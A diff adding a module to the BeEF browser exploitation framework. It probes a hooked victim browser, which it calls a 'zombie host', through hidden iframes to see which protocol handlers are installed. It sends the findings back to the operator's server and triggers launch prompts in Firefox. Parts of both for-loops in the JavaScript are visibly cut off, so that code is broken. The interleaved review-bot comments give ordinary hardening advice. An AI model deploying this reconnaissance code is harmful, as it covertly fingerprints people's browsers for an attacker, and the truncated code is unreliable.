diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js
new file mode 100644
index 000000000..1c84d64b6
--- /dev/null
+++ b/modules/host/detect_protocol_handlers/command.js
@@ -0,0 +1,78 @@
+//
+// Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ // Initialize
+ var handler_results = new Array;
+ var handler_protocol = "<%= @handler_protocol %>".split(/\s*,\s*/);
+ var handler_addr = "<%= @handler_addr %>";
+ var iframe = beef.dom.createInvisibleIframe();
+
+ // Internet Explorer
+ if (beef.browser.isIE()) {
+
+ var protocol_link = document.createElement('a');
+ protocol_link.setAttribute('id', "protocol_link");
+ protocol_link.setAttribute('href', "");
+ iframe.contentWindow.document.appendChild(protocol_link);
+
+ for (var i=0; i");
+ protocol_iframe.setAttribute('src', "");
+ protocol_iframe.setAttribute('style', "display:none;height:1px;width:1px;border:none");
+ document.body.appendChild(protocol_iframe);
+
+ for (var i=0; i').contentWindow.location = protocol+"://"+handler_addr;
+ } catch(e) {
+ if (e.name == "NS_ERROR_UNKNOWN_PROTOCOL")
+ result = protocol + " does not exist";
+ else result = protocol + " unknown";
+ }
+ if (!result) result = protocol + " exists";
+ handler_results.push(result);
+ }
+ setTimeout("document.body.removeChild(document.getElementById('protocol_iframe_<%= @command_id %>'));",3000);
+ }
+
+ // Return results
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'handlers='+JSON.stringify(handler_results));
+
+});
+
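Review bot: The cleanup call at the end of the Firefox branch passes a code string to `setTimeout`, which is evaluated like `eval` and has the command id spliced into it by the template. The `protocol_iframe` variable is already in scope there, so a function argument does the same job without building code from text: `setTimeout(function() { document.body.removeChild(protocol_iframe); }, 3000);`. The template values `@handler_protocol` and `@handler_addr` are also written straight into double-quoted JavaScript literals near the top, so a quote or backslash in an option value would end the literal early; whether they are escaped before rendering is not visible here and is worth confirming. Parts of both `for` loops are missing from this page, so the loop bodies themselves are not reviewed.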
diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml
new file mode 100644
index 000000000..ec7fcaf85
--- /dev/null
+++ b/modules/host/detect_protocol_handlers/config.yaml
@@ -0,0 +1,27 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ detect_protocol_handlers:
+ enable: true
+ category: "Host"
+ name: "Detect Protocol Handlers"
+ description: "This module attempts to identify protocol handlers present on the zombie host.

Only Internet Explorer and Firefox are supported.

Firefox users are prompted to launch the application for which the protocol handler is responsible.

Firefox users are warned when there is no application assigned to a protocol handler.

The possible return values are: unknown, exists, does not exist"
+ authors: ["bcoles"]
+ target:
+ working: ["IE"]
+ user_notify: ["FF"]
+ not_working: ["ALL"]
diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb
new file mode 100644
index 000000000..2447e87e5
--- /dev/null
+++ b/modules/host/detect_protocol_handlers/module.rb
@@ -0,0 +1,32 @@
+#
+# Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# Some additional protocol handlers #
+# ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc
+
+class Detect_protocol_handlers < BeEF::Core::Command
+
+ def self.options
+ return [
+ { 'ui_label'=>'Link Protocol(s)', 'name'=>'handler_protocol', 'description' => 'Comma separated list of protocol handlers', 'value'=>'http, https, ftp, file, mailto, news, feed, ldap', 'width'=>'200px' },
+ { 'ui_label'=>'Link Address', 'name'=>'handler_addr', 'description' => 'Handler Address - usually an IP address or domain name. The user will see this.', 'value'=>'Hello-From-BeEF', 'width'=>'200px' },
+ ]
+ end
+
+ def post_execute
+ save({'handlers' => @datastore['handlers']})
+ end
+
+end
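Review bot: `post_execute` stores `@datastore['handlers']` exactly as the browser sent it, and nothing in this hunk checks its shape or size. That value is produced on the client, so it is untrusted from the server's point of view; if the admin interface renders stored results without escaping, a crafted response could inject markup there (how results are displayed is not visible here, so confirm it). Consider parsing it as JSON and keeping only string entries that end in one of the three documented outcomes (`exists`, `does not exist`, `unknown`) before calling `save`. A comment on the method stating that the data is client-supplied would also help.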